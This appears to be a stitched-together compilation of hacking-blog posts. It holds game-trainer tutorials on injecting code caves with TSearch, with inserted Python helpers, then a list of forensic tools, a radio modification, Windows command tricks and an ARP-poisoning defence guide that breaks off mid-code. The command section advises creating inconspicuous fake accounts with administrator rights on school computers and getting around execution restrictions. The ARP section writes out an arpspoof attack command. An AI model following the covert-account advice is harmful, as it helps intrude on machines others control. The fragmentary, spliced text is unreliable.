Go back to the game and change the value (decrease the Health), pause again and go back to AutoHack. An address should now have appeared under ‘Original Value’. Here it is 294C500 (yours will be different).

Go to TSearch again, then to View and Show Calculator (if you haven’t already activated it). To the right of the equals sign there is a button called ‘H’ ... click on it to change it to ‘D’. Now we are in the Hex mode, coz everything we need to calculate is hex and not decimal.

Calculate your register address with 7C ... in this case it should be:

294C500 + 7C = 294C57C (you could have done it in your head, but I think you got the point)

Add this address to TSearch, 4Bytes. Change your Health value (address 294C57E here) to 17096 (that’s the value to get max Health) and you will see that the value in address 294C57C has changed to 1120403456. This is the value we need to inject into [ECX+0x7C] to get 100% health.

Now we will grab our code cave. Run SAS, select the process (the window name) and then on CODE CAVE FINDER. Have a look at the CODE CAVE RESULTS ... it should look like this:

SECTION   CODE CAVE START   CODE CAVE SIZE   CHARACTERISTICS
.text     0043ACD2          32E              Read/Exec
.rdata    00440680          980              Read Only
.data     00451CAC          354              Read/Write
.rsrc     00459AB0          350              Read Only

We will use the cave in the .data section of the game. Not every cave is suitable, so I suggest you always use the .data section or another section with Read/Write characteristics.

Before we inject our code, let’s make sure that there is really no code flying around. Go to the AutoHack window and disassemble the address 00451CAC.

Well, here I see that there is still a bit of code at address 00451CAB – inc dword ptr [eax] – lying around, so we had better scroll a few lines down.

I have chosen 00451CC1 ... you can see the opcodes are 00-00 and the asm code for that is ADD [EAX],AL --> this is unused code, so very good for us to inject our code in.

Now let’s begin …

INJECTING THE CODE

Go back to the TSearch main screen and click on View and then on EasyWrite (if you haven’t already activated it).

Click on the white letter thing to make a new EasyWrite option and write this in the upper section of the EasyWrite window, because this is for the option when it is activated (ON):

OFFSET 00451CC1
FSTP DWORD PTR [ECX+0x7C]
MOV DWORD PTR [ECX+0x7C],0x42C80000
MOV ESP,EBP
JMP 0040EDB8

OFFSET 0040EDB3
JMP 00451CC1

Now I will tell you everything this code does:

OFFSET 00451CC1                       --> this is the address of our code cave
FSTP DWORD PTR [ECX+0x7C]             --> we re-create the 1st destroyed instruction
MOV DWORD PTR [ECX+0x7C],0x42C80000   --> we move our health to 100% (0x42C80000 is 1120403456 in decimal; you can use TSearch's converter)
MOV ESP,EBP                           --> we re-create the 2nd destroyed instruction
JMP 0040EDB8                          --> we jump back to the main game code

OFFSET 0040EDB3                       --> this is the address of the main game code
JMP 00451CC1                          --> and from the main game code, we jump to our code cave


It is ALWAYS very important, that you re-create the instructions you’ve destroyed. If you ask why we have destroyed them; this is because of the jump to our code cave.

With this jump we will destroy 5 OPCODES but the line 0040EDB3 D9597C FSTP DWORD PTR [ECX+0x7C] has only 3 opcodes, so we have automatically destroyed the next instruction too, which is 0040EDB6 8BE5 MOV ESP,EBP.

After you have typed that in EasyWrite, click on OK and activate the option. Go back to the game, and you will see that when an enemy hits you, you will always have 100% health.

To see how this looks in Assembly Language with all the addresses and opcodes, go to AutoHack, click on Disassemble and write down the address 0040EDB3 and you will see:

ADDRESS    OPCODES      LANGUAGE
0040EDB3   E9092F0400   JMP 0x00451CC1

Right-click on this line and then click on Follow and you will see your code:

ADDRESS    OPCODES          LANGUAGE
00451CC1   D9597C           FSTP DWORD PTR [ECX+0x7C]
00451CC4   C7417C0000C842   MOV DWORD PTR [ECX+0x7C],0x42C80000
00451CCB   8BE5             MOV ESP,EBP
00451CCD   E9E6D0FBFF       JMP 0x0040EDB8

Great, eh? Now we have almost finished this tutorial. Go back to the EasyWrite option we have just created and you will see that there is also a section in the lower EasyWrite window. This is used to deactivate our option (OFF). Write this:

OFFSET 0040EDB3
FSTP DWORD PTR [ECX+0x7C]

OFFSET 0040EDB6
MOV ESP,EBP

The only thing we do here is changing the game code ‘back to normal’. That means that the jump to our code cave will be overwritten by the original code, to disable the ‘Infinite Health’ hack.
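The detour above, checked byte for byte against the listing TSearch showed, as an added Python example that is not part of the tutorial and not TSearch's or SAS's code: it encodes the two JMP rel32 displacements, re-uses the instruction bytes from the listing (there is no assembler here), shows why the 5-byte JMP destroys both FSTP and MOV ESP,EBP, and generalises the hook to a stolen instruction longer than 5 bytes, as with the 6-byte FLD in the next tutorial. It also shows where the ‘magic’ numbers 17096 and 1120403456 come from.

```python
import struct

NOP = b"\x90"
JMP_LEN = 5                     # E9 + 4-byte displacement

def jmp_rel32(src, dst):
    """Encode `JMP dst` placed at `src`: E9 followed by a signed 32-bit
    displacement measured from the end of the 5-byte instruction."""
    return b"\xE9" + struct.pack("<i", dst - (src + JMP_LEN))

def nop_out(insn):
    """Tutorial 2's 'Nop This Line': one 90 per opcode byte, so the instruction
    keeps its length and nothing after it moves."""
    return NOP * len(insn)

def detour(site, site_insns, cave):
    """Hook the game code at `site`: steal whole instructions until a 5-byte JMP
    fits, pad with NOPs (the 'HEX 90' of Tutorial 4) and report the address of
    the first untouched instruction, which the cave must jump back to.
    `site_insns` are the original instructions at `site`, in order, as bytes."""
    stolen, taken = [], 0
    for insn in site_insns:
        if taken >= JMP_LEN:
            break
        stolen.append(insn)
        taken += len(insn)
    if taken < JMP_LEN:
        raise ValueError("not enough instructions at site to hold a 5-byte JMP")
    patch = jmp_rel32(site, cave) + NOP * (taken - JMP_LEN)
    return patch, stolen, site + taken

def build_cave(cave, body, back):
    """Lay out the code cave: `body` (re-created stolen instructions plus our own
    code, in whatever order the hack needs) followed by the JMP back to `back`."""
    return body + jmp_rel32(cave + len(body), back)

def float_bits(x):
    """How the health/fuel values in these games are stored: IEEE-754 single."""
    return struct.unpack("<I", struct.pack("<f", x))[0]

def high_word(bits):
    """The 2-byte value TSearch shows at (float address + 2): the float's top half."""
    return bits >> 16

# Instruction bytes exactly as TSearch listed them in this tutorial (Alien Defense)
FSTP_ECX_7C = bytes.fromhex("D9597C")          # FSTP DWORD PTR [ECX+0x7C]
MOV_ESP_EBP = bytes.fromhex("8BE5")            # MOV ESP,EBP
POP_EBP     = bytes.fromhex("5D")              # POP EBP (must survive intact)
SET_HEALTH  = bytes.fromhex("C7417C0000C842")  # MOV DWORD PTR [ECX+0x7C],0x42C80000

def tutorial3_hack():
    """Infinite Health: JMP at 0040EDB3 into the cave at 00451CC1; the cave
    re-creates FSTP, sets health, re-creates MOV ESP,EBP and returns to 0040EDB8."""
    site, cave = 0x0040EDB3, 0x00451CC1
    patch, stolen, back = detour(site, [FSTP_ECX_7C, MOV_ESP_EBP, POP_EBP], cave)
    assert stolen == [FSTP_ECX_7C, MOV_ESP_EBP]   # 3 + 2 = 5 bytes destroyed
    cave_bytes = build_cave(cave, FSTP_ECX_7C + SET_HEALTH + MOV_ESP_EBP, back)
    return patch, back, cave_bytes

# Tutorial 4 (AirStrike 3D): the hooked FLD is 6 bytes, so one NOP of padding
FLD_EDX_103 = bytes.fromhex("D98203010000")    # FLD DWORD PTR [EDX+0x103]

def tutorial4_hook():
    """Returns the 6-byte patch for 00404629 (JMP 01FBE380 + NOP) and the
    return address the cave uses (0040462F)."""
    patch, _, back = detour(0x00404629, [FLD_EDX_103], 0x01FBE380)
    return patch, back

if __name__ == "__main__":
    patch, back, cave = tutorial3_hack()
    print("0040EDB3:", patch.hex().upper(), "-> back to", hex(back))
    print("00451CC1:", cave.hex().upper())
    b = float_bits(100.0)
    print(f"100% health as float: {b:#x} = {b}, high word {high_word(b)}")
```

Both encodings match the listing (E9092F0400 at 0040EDB3, E9E6D0FBFF at 00451CCD), and 17096 turns out to be 0x42C8, the upper half of 100.0 stored as a float, which is why poking it into the 2-byte address two bytes above the float gives full health.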

OK then … another tutorial finished. I hope you have managed everything and learned from it. You are now able to defeat the DMA and inject your OWN code into the game code, which is very often used by advanced game hackers to make hacks you cannot do with ‘normal’ game training.

As always I suggest you download more shareware games and practise what we have just done. Since the next tutorial will be a bit more complex, you should prepare for it ;)

If you have questions/comments or suggestions for another tutorial then email me at: mtahirzahid or contact me on -->

For more tutorials visit: http://mtahirzahid.blogspot.com

A big THANK YOU is flying out to Apache- for being the 1st who is putting this tutorial on his site.

greetz are also flying out to these people and friends (in alphabetical order): [Death], [sheep], allen, ape, CoaxCable, Drax, HaD-Team, jmp_fce4, m1ndphuck, Mango, maZel, spookie, toker, Trelpie, Tron, Tsongkie and of course VegitoSSJ.

You are allowed to spread this tutorial to any sites as long as the content of this tutorial is exactly the same as the one on http://mtahirzahid.blogspot.com

Game Training Tutorial #4

Tutorial Nr. 4 Advanced Game Training: Learning how to make hacks for Player Only

Tools Needed: TSearch

http://mtahirzahid.blogspot.com

AirStrike 3D Operation W.A.T v1.65

http://www.divogames.com

Sheep's Array of Sunshine v1.3

http://mtahirzahid.blogspot.com

What we will learn: In this tutorial we will learn how to make hacks for Player Only.

A new routine: As you may have noticed (you would probably only notice this when you have trained/hacked an iso game) a few games are using the same routine in the game code for the player AND the enemy and/or other things as well.

To explain it a bit more: let’s say you want to hack the Health in a game. After you have found the address you set a memory breakpoint on it, you change the value (decrease the Health) and AutoHack gives you the address which is decreasing your Health. Then you nop the instruction, you go back to the game and you see that you have Infinite Health. But when you play a bit longer you notice that the enemies have Infinite Health as well … That means that the game is using the same instruction for other things as well as to decrease your Health. As far as I know, there is only one shareware game which is using the same routine to decrease the player AND the enemy health.

And this game is called AirStrike 3D. Today this will be our target game.

START

Obviously we have to find the Health address first.

I think the search you have to do is completely clear... if not:

Start TSearch, run the game, begin a mission, select the process AirStrike3D.exe in TSearch and start the search for an unknown value.

Go back to the game, decrease the Health, search again; decrease the Health, search again; decrease the Health, search again; and search for has not changed, to save a bit time…

I have found the address 466355.

Now we will set a memory Breakpoint on it.

With a Memory Breakpoint, TSearch will show us every code which ‘writes’ to the address we have set a breakpoint on.

Enable the debugger and AutoHack the address. Go back to the game and decrease the Health. This line will pop up:

ADDRESS   OPCODES        LANGUAGE
406197    D99E03010000   FSTP DWORD PTR [ESI+0x103]

This is the instruction which is changing our Health. Right-click it and then ‘Nop This Line’. Go back to the game and check it. Yes … when an enemy hits you, your Health will not be decreased. Play a bit around and try to kill some enemies. You will notice that you can’t kill them. That’s because you have just nopped an instruction, which is also used to change the enemy Health.

But still … this code is not useless to us … think about it … I will tell you later ;)

Hacking Health for Player Only

As you know, we have just set a Memory Breakpoint on the Health address (remember: With a Memory Breakpoint, TSearch will show us every code which ‘writes’ to the address we have set a breakpoint on).

We will now set an Open Breakpoint on it.

With an Open Breakpoint, TSearch will show us every code which either ‘reads’ or ‘writes’ to the address we have set a breakpoint on.

In the AutoHack window go to Edit and then Set BreakPoint and write down the Health address (466355), Bpm size: 1 and set the Type to: Read/Write. Now click on Set and AutoHack should have constantly returned one address. Now go back to the game, unpause it but do NOT change the health. Make sure that there are no enemies shooting at you right now. Fly around for 2-3 seconds (remember: do NOT change the health), pause the game again and go back to AutoHack. The debugger returned 3 addresses, which are only READING the address.

ADDRESS   OPCODES        LANGUAGE
4066F2    D98103010000   FLD DWORD PTR [ECX+0x103]
41ACDA    D906           FLD DWORD PTR [ESI]
404629    D98203010000   FLD DWORD PTR [EDX+0x103]

Not even one of these three addresses is used by the computer. For our health injection we will use this one:

404629    D98203010000   FLD DWORD PTR [EDX+0x103]

Well … for our Infinite Health hack, we have to know which value we have to inject into [EDX+0x103]. Right-click the address in the disassembler window and click Register. Now go to the Register tab, choose the register EDX and click on the square to the left of the address. Go back to the game, unpause it, pause it, go back to AutoHack and you will see that an address has been returned. Here it is 466250. Calculate this address with 103: 466250 + 103 = 466353. Add this address to TSearch’s CheatTable. When you have 100% Health, the value of address 466353 = 1137180672 and that’s the value which we will inject into [EDX+0x103].

But this is not the only thing we will do in this tutorial … we will also use this one:

406197    D99E03010000   FSTP DWORD PTR [ESI+0x103]

to make a One Hit Kill hack (This is the instruction, which returned when we have set a memory breakpoint on the health address. It is changing both [player AND enemy Health]).

That’s the advantage when a game is using the same routine for the player and the enemy … we can make two hacks, though we have only searched for one address ;)

OK, now it’s time to grab our code cave. Run SAS, select the process (the window name) and then click on CODE CAVE FINDER. Have a look at the CODE CAVE RESULTS ... it should look like this:

SECTION   CODE CAVE START   CODE CAVE SIZE   CHARACTERISTICS
.text     00430850          000007B0         Read/Exec
.rdata    00437CAE          00000352         Read Only
.data     01FBE364          00000C9C         Read/Write
.rsrc     02012398          00000C68         Read Only

The .data section has read/write characteristics, so we will use this one. In AutoHack disassemble the address 01FBE364 and scroll a few lines down, because we will need the first lines for a few ‘other things’ … in a moment you will see what I mean. We will use address 01FBE380.

First we will make the One Hit Kill … (big thx to Veggy for the code snippet) … go to TSearch and make a new EasyWrite option. Write this in the upper box (I will explain everything more detailed later):

OFFSET 01FBE3A6
FSTP DWORD PTR [ESI+0x103]
CMP BYTE PTR [1FBE36D],0x0
JE @BackToGame1
CMP BYTE PTR [1FBE370],ESI
JE @BackToGame1
MOV DWORD PTR [ESI+0x103],0x00000000
@BackToGame1:
JMP 0040619D

OFFSET 00406197
JMP 01FBE3A6
HEX 90

That was our One Hit Kill … now we will make the Infinite Health hack for Player Only. Write this in the upper box, but above the One Hit Kill code:

OFFSET 01FBE380
MOV DWORD PTR [1FBE370],EDX
CMP BYTE PTR [1FBE36B],0x0
JE @BackToGame
MOV DWORD PTR [EDX+0x103],0x43C80000
@BackToGame:
FLD DWORD PTR [EDX+0x103]
JMP 0040462F

OFFSET 00404629
JMP 01FBE380
HEX 90

Now it's time to explain everything this code does. We will start with Infinite Health:

OFFSET 01FBE380 I think this is obvious … it’s our code cave. From here all our code will be executed.

MOV DWORD PTR [1FBE370],EDX OK, as I said, we will use the first few lines of the .data section for a few ‘other things’. This is one of those ‘other things’. Here we move the player structure base into 1FBE370. We will need this for the One Hit Kill option, because there we will compare whether the player OR the enemy got hit. As you know, the instruction

406197    D99E03010000   FSTP DWORD PTR [ESI+0x103]

decreases the player health as well as the enemy health. So when the player was hit, EDX will have the player structure base, and when the enemy was hit, it will have the enemy structure base. So after we have moved the PLAYER structure base into 1FBE370, we are able to compare it with the enemy structure base in our One Hit Kill option.

CMP BYTE PTR [1FBE36B],0x0 This is another one of these ’other things’. With this compare routine, we are able to compare if the option is ON or OFF. Since 1FBE36B is in our .data code cave, its standard code is 00 (ADD [EAX],AL). So when it is 00 the option is OFF. But when we inject 0001 (ADD [ECX],AL) into 1FBE36A, the option is ON.

JE @BackToGame After the cmp routine has been executed this instruction will jump back to the game, when the option is off. JE = Jump if Equal. That means if 1FBE36B is 00, the One Hit Kill is off and we have to jump back to the main game code. If 1FBE36B is 01, continue with the next instruction, which is:

MOV DWORD PTR [EDX+0x103],0x43C80000
Here we move the Health value to 100% (1137180672 = 43C80000 in hex).

@BackToGame:
FLD DWORD PTR [EDX+0x103]
JMP 0040462F
We use the BackToGame routine to re-create the destroyed instruction and jump back to the game after our code has been executed. Remember:

CMP BYTE PTR [1FBE36B],0x0

JE @BackToGame

If 1FBE36B (Infinite Health) = OFF, we have to jump back to the game.

OFFSET 00404629
JMP 01FBE380
HEX 90
From the address 00404629 we jump to our code cave (01FBE380). We use the HEX 90 instruction (HEX 90 is the same as NOP), because with the jump to our code cave we have destroyed 5 bytes but the original instruction was 6 bytes long. So we have overwritten the destroyed 6 byte instruction with another 6 byte instruction. When we do not replace the original number of bytes, the game would probably crash.

Now for the One Hit Kill hack:

OFFSET 01FBE3A6 Same as above: It’s our code cave. From here all our code will be executed.

FSTP DWORD PTR [ESI+0x103] We re-create the destroyed instruction.

CMP BYTE PTR [1FBE36D],0x0
We compare whether the option was activated or not (on = 1, off = 0).

JE @BackToGame1
If the option has not been activated, jump back to the main game code.

CMP BYTE PTR [1FBE370],ESI
Do you remember this line in the Infinite Health code: MOV DWORD PTR [1FBE370],EDX? There we moved the player structure base into 1FBE370. Now we COMPARE the base of the person who got hit (player or enemy, in ESI) with the player structure base, because if ESI is the same as 1FBE370, the PLAYER was hit and not the enemy, which means that we can:

JE @BackToGame1 Jump back to the main game code.

MOV DWORD PTR [ESI+0x103],0x00000000 If ESI WAS the enemy structure base, we can move the enemy health value to 0, so that we are able to kill the enemy with One Hit ;)

@BackToGame1:
JMP 0040619D
We use the BackToGame1 routine to jump back to the game. Remember:

CMP BYTE PTR [1FBE36D],0x0

JE @BackToGame1

If 1FBE36D (One Hit Kill) = OFF, we will jump back to the game.

OFFSET 00406197
JMP 01FBE3A6
HEX 90
Same as above: From the address 00406197 we jump to our code cave (01FBE3A6). We use the HEX 90 instruction (HEX 90 is the same as NOP), because with the jump to our code cave we have destroyed 5 bytes but the original instruction was 6 bytes long. So we have overwritten the destroyed 6 byte instruction with another 6 byte instruction. When we do not replace the original number of bytes, we would probably crash the game.
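The byte arithmetic behind the two "OFFSET ... JMP <cave> HEX 90" steps above is worth seeing once in code. The following is an added example and not part of the tutorial: it computes the 5-byte near jump (E9 + 32-bit displacement) that TSearch writes for you, pads it with NOPs to the length of the overwritten instruction, and derives the return address the cave must jump back to. The hook and cave addresses come from the text; the helper names (build_hook_patch, return_address, decode_jump_target, float_bits) are my own.

```python
import struct

# Added example, not from the tutorial: the byte-level arithmetic behind the
# "OFFSET hook / JMP cave / HEX 90" steps.  Addresses are the ones in the text;
# helper names are assumptions of this example.

JMP_REL32 = 0xE9   # opcode of the 5-byte near jump (E9 + rel32)
NOP = 0x90         # single-byte NOP used as padding ("HEX 90")

def rel32(from_addr, to_addr):
    """Displacement encoded in a JMP rel32 placed at from_addr.

    x86 measures the displacement from the END of the 5-byte instruction.
    """
    return (to_addr - (from_addr + 5)) & 0xFFFFFFFF

def build_hook_patch(hook_addr, cave_addr, orig_len):
    """Bytes to write at hook_addr: JMP cave, NOP-padded to orig_len.

    orig_len is the length of the instruction being overwritten.  It must be
    at least 5 (the jump itself); every extra byte becomes a NOP so the next
    original instruction still starts on a boundary (no crash on return).
    """
    if orig_len < 5:
        raise ValueError("a 5-byte JMP does not fit in %d bytes" % orig_len)
    patch = bytes([JMP_REL32]) + struct.pack("<I", rel32(hook_addr, cave_addr))
    return patch + bytes([NOP]) * (orig_len - 5)

def return_address(hook_addr, orig_len):
    """Where the cave's final JMP must go: the first untouched instruction."""
    return hook_addr + orig_len

def decode_jump_target(patch, at_addr):
    """Inverse of build_hook_patch: follow a JMP rel32 found at at_addr."""
    if patch[0] != JMP_REL32:
        raise ValueError("not a JMP rel32")
    disp = struct.unpack("<i", patch[1:5])[0]   # signed displacement
    return (at_addr + 5 + disp) & 0xFFFFFFFF

def float_bits(value):
    """IEEE-754 single precision stored as a DWORD, e.g. 0x43C80000."""
    return struct.unpack("<f", struct.pack("<I", value))[0]

if __name__ == "__main__":
    # Infinite Health hook: 00404629 (6-byte FLD) -> cave 01FBE380
    p = build_hook_patch(0x00404629, 0x01FBE380, 6)
    print(p.hex(), hex(return_address(0x00404629, 6)))   # e9529dbb0190 0x40462f
    # One Hit Kill hook: 00406197 (6-byte FSTP) -> cave 01FBE3A6
    p2 = build_hook_patch(0x00406197, 0x01FBE3A6, 6)
    print(p2.hex(), hex(return_address(0x00406197, 6)))  # e90a82bb0190 0x40619d
    print(float_bits(0x43C80000))                          # 400.0
```

Two things the numbers show: the return addresses 0040462F and 0040619D used by the two caves are exactly hook + 6, and the "100%" health constant 43C80000 is the float 400.0 stored in the structure. The NOP padding only works because the 6-byte instruction ends on an instruction boundary; if a jump ever cut into the middle of the following instruction, the cave would have to re-create every clobbered instruction, not just one.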

Phew … that was the code for the Infinite Health and One Hit Kill hack… Activate the option and go back into the game to test it! Well … not working, eh? Of course it does not work :P

Do you remember this line in the Infinite Health code?: CMP BYTE PTR [1FBE36B],0x0

And this line in the One Hit Kill code?: CMP BYTE PTR [1FBE36D],0x0

As I said earlier, here we are comparing whether the option is ON or OFF. At the moment 1FBE36B and 1FBE36D are both 00, which means that the options are off. To enable them, we have to inject 0001 into 1FBE36A and 1FBE36C. To do this, make a new EasyWrite option and write this in the upper box, to enable Infinite Health:

OFFSET 1FBE36A
ADD [ECX],AL

And to deactivate the Option write this in the lower box:

OFFSET 1FBE36A
ADD [EAX],AL

Do the same for the One Hit Kill option (make a new EasyWrite option and write the same code in the upper and lower box). You only have to change the offsets to 1FBE36C.

Now activate ALL the EasyWrite options and go back to the game. You will see that everything is working perfectly. You have Infinite Health and the enemies are dying with One Hit. You could also disable Infinite Health and you will still kill enemies with One Hit. Or disable One Hit Kill and you will still have Infinite Health.

Phew … that was a long tutorial, wasn't it? Still … I hope that I have explained everything well enough so that you understand it.

Now the best thing for you to do would be to hack a few iso games. Install a few of them and try to hack Health, Ammo, make One Hit Kills, etc.

I also advise you to learn asm, because when you know asm, you can do pretty much everything you want, for example hacks like Kill All, Rapid Fire, Super Speed, Super Jump, Invisibility, Get All Weapons/Items, Enemies don't Shoot, etc. I know most of the hacks are hard to do without SIce, but you should at least try to make a few of them. It always depends on your coding skills ;)

Still … I hope you managed everything in this tutorial and learned from it, since at the moment this one is the most extensive one.

If you have questions/comments or suggestions for another tutorial then email me at: mtahirzahid or contact me on -->

For more tutorials visit: http://mtahirzahid.blogspot.com

A big THANK YOU is flying out to apache- for being the 1st who is putting this tutorial on his site.

greetz are also flying out to these people and friends (in alphabetical order): [Death], [sheep], allen, ape, CoaxCable, Drax, HaD-Team, jmp_fce4, m1indphuck Mango, maZel, spookie, toker, Trelpie, Tron, Tsongkie and of course VegitoSSJ.

You are allowed to spread this tutorial to any sites as long as the content of this tutorial is exactly the same as the one on http://mtahirzahid.blogspot.com

12 FBI tools:

1- Metasploit
2- ads locator 2004.zip
3- historian 1.4.rar
4- mui cacheview 1.00.zip
5- NetworkMiner 0.87.zip
6- regripper 2.02.zip
7- systemreport 2.5.rar
8- usb-history r1.zip
9- windows file analyzer 1.0.zip
10- disk investigator 1.4.exe
11- live view 0.6.exe
12- WinPcap 4.02.exe


Transistor Radio Hack!

Step 1: Get Started

The only thing you need for this project is an AM/FM transistor radio, an older model that has a physical adjustment for tuning rather than digital. This will be a wheel or slider that changes stations. The only tool you should need is a small screwdriver. Open the radio by removing all the screws. Watch for the hidden screws located in the battery compartment. TIP: Stick them to a magnet so you don't lose them.

Step 2: Locate the Components

Now we need to locate the components we will be modifying. First, look for the main tuning capacitor. It will be a square, usually clear, compartment that houses the tuning controls. It will be right next to the tuning wheel. Near the main tuning capacitor you will see two coils of copper wire. These are what control and limit the frequency range of the radio.

Step 3: Tuning Transformers

The tuning transformers are square transformers with tuning slots in the top. Mine had five. TIP: The best way to locate the one we will be adjusting is to look for a couple of diodes closest to one

Step 4: Get to Work

Now, turn on the radio and tune it to the clearest station on the high end of the FM band, near 108. TIP: Confirm you have found the correct copper coil (one controls AM, the other FM) by touching it with a screwdriver. You should hear a change in the station. Using your screwdriver, slightly spread out the copper coils. The station will fade away and you have just increased the range on the upper end of the FM band beyond 108 MHz!

Adding/Modifying User Accounts In Windows Via CMD

Hello guys! Today I will show you some of the cool CMD tricks. If you don't know how to launch CMD, then go to Start > Run, type CMD and hit Enter. A command prompt window will appear, like shown above. So now you have CMD and you can add a new user with the command below:

C:\>net user username /ADD

Where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think it's a student who really is at school, when really, the person doesn't EXIST! If you want to have a password, use this instead:

C:\>net user username password /ADD

Where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'Usman' and a password of 'LULX':

C:\>net user Tahir LULX /ADD

Right then, now that we can create accounts, let's delete them :)

C:\>net user Tahir /DELETE

This will delete poor Usman's account with the help of CMD. Let's give you admin privileges :)

C:\>net localgroup Administrators Tahir /ADD

This will make Tahir an admin. Remember that some places or computers may not call their admins 'Administrators', and so you need to find out the name of the local group they belong to. You can list all the local groups by typing:

C:\>net localgroup

Running .exe files you can't usually run

In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk. :D

A small trick for comic book lovers

If you are a comic book lover like me and while reading online your net keeps on disconnecting, then I have a small trick for you. The thing you need is the IDM Website Grabber. First of all download it and then install it. After installation go to the folder and open IDM Grabber; a window will appear like this. Click on the grabber like shown in the picture.

After hitting it a window will appear; start filling in the blanks and information.

Then grab the site and all the files of that site will be found in the destination folder, and you can start reading comic books offline without any fear.

4 Steps to Prevent Man in the Middle Attack ARP Poisoning in LAN

What is a man in the middle attack? According to Wikipedia: in cryptography and computer security, it is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all messages going between the two victims and inject new ones, which is straightforward in many circumstances (for example, an attacker within reception range of an unencrypted Wi-Fi wireless access point can insert himself as a man-in-the-middle).

And what is ARP poisoning or ARP spoofing? According to Wikipedia: a technique whereby an attacker sends fake ("spoofed") Address Resolution Protocol (ARP) messages onto a Local Area Network. Generally, the aim is to associate the attacker's MAC address with the IP address of another host (such as the default gateway), causing any traffic meant for that IP address to be sent to the attacker instead.

The man in the middle attack can happen because the attacker modified the ARP table (ARP spoofing) and changed the ARP mapping to the malicious attacker's computer. Here I try to describe it using a picture (courtesy of irongeek.com).

We as humans will absolutely know who is Alan and who is Brian by recognizing their faces, but computers depend on the ARP table network mapping (OSI layer 2 and layer 3).

Name      IP Address      MAC Address
Alan      192.168.1.2     00-00-00-00-00-00-00-01
Brian     192.168.1.3     00-00-00-00-00-00-00-02
Cracker   192.168.1.88    00-00-00-00-00-00-00-03

So if Alan wants to connect to Brian, the computer will translate Brian's IP address (192.168.1.3) to its MAC address 00-00-00-00-00-00-00-02. That is how it should be, but because the attacker is doing ARP spoofing or ARP poisoning, they will change the ARP mapping. If the network is already poisoned, when Alan wants to send a packet to Brian, Alan will translate Brian (192.168.1.3) to MAC 00-00-00-00-00-00-00-03, and vice versa.

In this tutorial I will show you how ARP spoofing can happen and how to prevent it on your own computer so you will not be the victim. In the scenario for today's tutorial I will use Windows 7 as the victim and Kali Linux as the attacker.

4 Steps to Prevent Man in the Middle Attack ARP Poisoning in LAN:

Before you start, you can download the Static ARP Changer tool to change the ARP routing automatically (128% virus free guaranteed): Download Static ARP Changer

1. First I will show you my Windows 7 ARP table before it is poisoned by the attacker:

arp -a

The red box in the picture above is the victim's router address; the router MAC address is xx-xx-xx-5a-26-94. The victim IP address is 192.168.8.100. Here is the attacker IP and MAC info:

2. When the attacker does ARP spoofing using arpspoof and attacks the victim:

arpspoof -i eth0 -t 192.168.8.100 -r 192.168.8.8

Description:
-i eth0 --> the attacker uses the eth0 interface to perform the attack.
-t 192.168.8.100 --> the attacker targets the IP address 192.168.8.100.
-r 192.168.8.8 --> the attacker will intercept the traffic between -t and -r, where -r is the remote host or the router.

3. When the victim runs the arp -a command again on his computer, the router MAC address has changed into the attacker's computer's.

That means every transaction the victim makes will go through the attacker's computer first and then to the real router. We need to protect the ARP mapping table so the attacker cannot do this to us.

4. We need to run this command on our Windows PC:

arp -s 192.168.8.8 xx-xx-xx-5a-26-94

Description:
-s --> add a static ARP entry
192.168.8.8 --> your router IP address
xx-xx-xx-5a-26-94 --> your router MAC address

Note: If you get the error "The ARP entry addition failed: Access is denied.", run this command to find your interface name:

netsh interface show interface

and then run this command to add the static ARP entry:

netsh interface ip add neighbors "Wireless Network Connection" "192.168.8.8" "xx-xx-xx-5a-26-94"

Now when we run the arp -a command again, our ARP table has changed to static.
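Beyond pinning the entry, it helps to check the table for the two signs of poisoning the screenshots above show: the gateway's MAC differing from the one you recorded, and one MAC answering for several IPs. The following is an added example and not part of the tutorial: it parses Windows `arp -a` output and returns alerts. The gateway IP 192.168.8.8 and victim IP 192.168.8.100 are from the text; the MAC addresses, the sample output and the function names (parse_arp_table, check_arp_table) are constructed for this example.

```python
import re

# Added example, not from the tutorial: detect the ARP-table changes described
# above.  IPs are the ones in the text; MACs and sample output are constructed.

ARP_LINE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(\w+)",
    re.IGNORECASE,
)

def parse_arp_table(text):
    """Return [(ip, mac, type)] from Windows `arp -a` output; MACs lowercased."""
    entries = []
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            entries.append((m.group(1), m.group(2).lower(), m.group(3).lower()))
    return entries

def check_arp_table(entries, pinned):
    """Compare the table with pinned {ip: mac} and return a list of alert strings.

    Check 1: a pinned host's MAC differs from what the table holds (the router
    line in step 3 above).  Check 2: one MAC is mapped to more than one IP,
    which is what the table looks like once the attacker's own MAC is also
    mapped onto the router's IP.
    """
    alerts = []
    by_ip = {ip: mac for ip, mac, _ in entries}
    for ip, mac in pinned.items():
        seen = by_ip.get(ip)
        if seen is not None and seen != mac.lower():
            alerts.append("MAC for %s changed: expected %s, table has %s"
                          % (ip, mac.lower(), seen))
    owners = {}
    for ip, mac, _ in entries:
        # broadcast and IPv4 multicast MACs are legitimately shared; skip them
        if mac == "ff-ff-ff-ff-ff-ff" or mac.startswith("01-00-5e"):
            continue
        owners.setdefault(mac, []).append(ip)
    for mac, ips in owners.items():
        if len(ips) > 1:
            alerts.append("MAC %s claims several IPs: %s" % (mac, ", ".join(ips)))
    return alerts

GATEWAY_MAC = "00-11-22-5a-26-94"    # constructed stand-in for xx-xx-xx-5a-26-94
ATTACKER_MAC = "00-aa-bb-cc-dd-ee"   # constructed attacker MAC

# Constructed `arp -a` output, before and after poisoning.
ARP_BEFORE = """\
Interface: 192.168.8.100 --- 0xb
  Internet Address      Physical Address      Type
  192.168.8.8           00-11-22-5a-26-94     dynamic
  192.168.8.77          00-aa-bb-cc-dd-ee     dynamic
  192.168.8.255         ff-ff-ff-ff-ff-ff     static
"""

ARP_AFTER = """\
Interface: 192.168.8.100 --- 0xb
  Internet Address      Physical Address      Type
  192.168.8.8           00-aa-bb-cc-dd-ee     dynamic
  192.168.8.77          00-aa-bb-cc-dd-ee     dynamic
  192.168.8.255         ff-ff-ff-ff-ff-ff     static
"""

PINNED = {"192.168.8.8": GATEWAY_MAC}

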